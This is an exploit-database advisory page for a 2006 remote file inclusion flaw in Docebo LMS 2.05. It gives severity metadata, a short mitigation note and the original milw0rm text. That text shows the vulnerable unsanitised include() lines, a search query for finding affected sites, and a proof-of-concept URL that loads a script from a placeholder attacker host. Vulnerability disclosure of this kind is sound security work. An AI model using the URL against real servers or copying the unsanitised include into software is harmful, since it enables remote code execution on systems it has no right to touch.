header-logo
Suggest Exploit
vendor:
Docebo LMS
by:
beford
7,5
CVSS
HIGH
Remote File Inclusion
98
CWE
Product Name: Docebo LMS
Affected Version From: 2.05
Affected Version To: 2.05
Patch Exists: YES
Related CWE: N/A
CPE: a:docebo:docebo_lms:2.05
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: N/A
2006

Docebo LMS 2.05

Docebo LMS 2.05 is vulnerable to Remote File Inclusion. The vulnerable files are doceboLMS205/modules/credits/business.php, doceboLMS205/modules/credits/credits.php and doceboLMS205/modules/credits/help.php. An attacker can exploit this vulnerability by sending a malicious URL to the vulnerable application. The malicious URL contains a malicious script which will be executed on the vulnerable application.

Mitigation:

The application should validate the user input and filter out any malicious code. The application should also use a whitelist of allowed characters and reject any input that does not match the whitelist.
Source

Exploit-DB raw data:

Vulnerable Script: Docebo LMS 2.05
Discovered: beford <xbefordx gmail com>

Noobs: %22Based+on+DoceboLMS+2.0%22

Vulnerable Files

doceboLMS205/modules/credits/business.php =>
include($_GET['lang'].'/language.php');

doceboLMS205/modules/credits/credits.php =>
include($_GET['lang'].'/language.php');

doceboLMS205/modules/credits/help.php => include($_GET['lang'].'/language.php');

http://www.oops.org/DOCEBO205/modules/credits/help.php?lang=http://<evilh4x0rscript>/?

# milw0rm.com [2006-05-25]

Navigation

Suggest Exploit

Services By CQR